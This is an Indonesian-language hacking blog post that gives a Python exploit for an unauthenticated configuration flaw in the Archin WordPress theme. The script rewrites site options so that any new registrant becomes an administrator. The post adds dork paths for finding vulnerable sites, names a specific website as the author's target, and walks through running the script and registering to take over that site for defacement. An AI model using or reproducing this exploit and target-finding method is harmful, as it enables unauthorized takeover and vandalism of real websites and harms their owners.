Jumat, 17 Januari 2014

10.44
1
TeronkID - hay guys :D
lagi lagi tentang deface nih hehe kali ini ane berbagi deface dengan archin

 # Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib

#target site
site = "target website"
#path to ajax.php
url = "/wp-content/themes/yvora/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()
    
ChangeOption(site, url, "admin_email", "emailmu")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"

save file nya berextensi .py di phython27 :
untuk dork nya bisa gunakan yang ada di sini :

/wp-content/themes/candy/hades_framework/
 /wp-content/themes/vithy/hades_framework/
 /wp-content/themes/sodales/hades_framework/
 /wp-content/themes/*/hades_framework/
 /wp-content/themes/felici/hades_framework/
 /wp-content/themes/averin/hades_framework/
 /wp-content/themes/shotzz/hades_framework/
 /wp-content/themes/KLR/hades_framework/
 /wp-content/themes/yvora/hades_framework/
 /wp-content/themes/ratius/hades_framework/
 /wp-content/themes/dagda/hades_framework/
 /wp-content/themes/shopsum/hades_framework/

kembangkan dork nya untuk menyempurnakan nya :D
nah di sini ane udah punya target sendiri untuk di eksekusi

http://www.9to5fresh.com
setelah kita tambahkan url nya seperti ini
/wp-content/themes/yvora/hades_framework/option_panel/ajax.php
maka hasil nya akan begini :
http://www.9to5fresh.com//wp-content/themes/averin/hades_framework/option_panel/ajax.php
kalo ngeblnk tanda nya vuln ^_^
liatgambar di bawah :




seteleh itu kita eksekusi make cmd
ketik
cd\
cd\python27
fileagan.py



naaah ,kalo udah sukses kita tinggal register di web tersebut :D
http://www.9to5fresh.com/wp-login.php
maka akan seperti ini :



nah di coom register isi dengan user agan dan email yang harus aktif :)
nah kalo udah selesai register tinggal lihat email agan dan isi user dan password yang ada di email masuk dari web tersebut :)





1 komentar: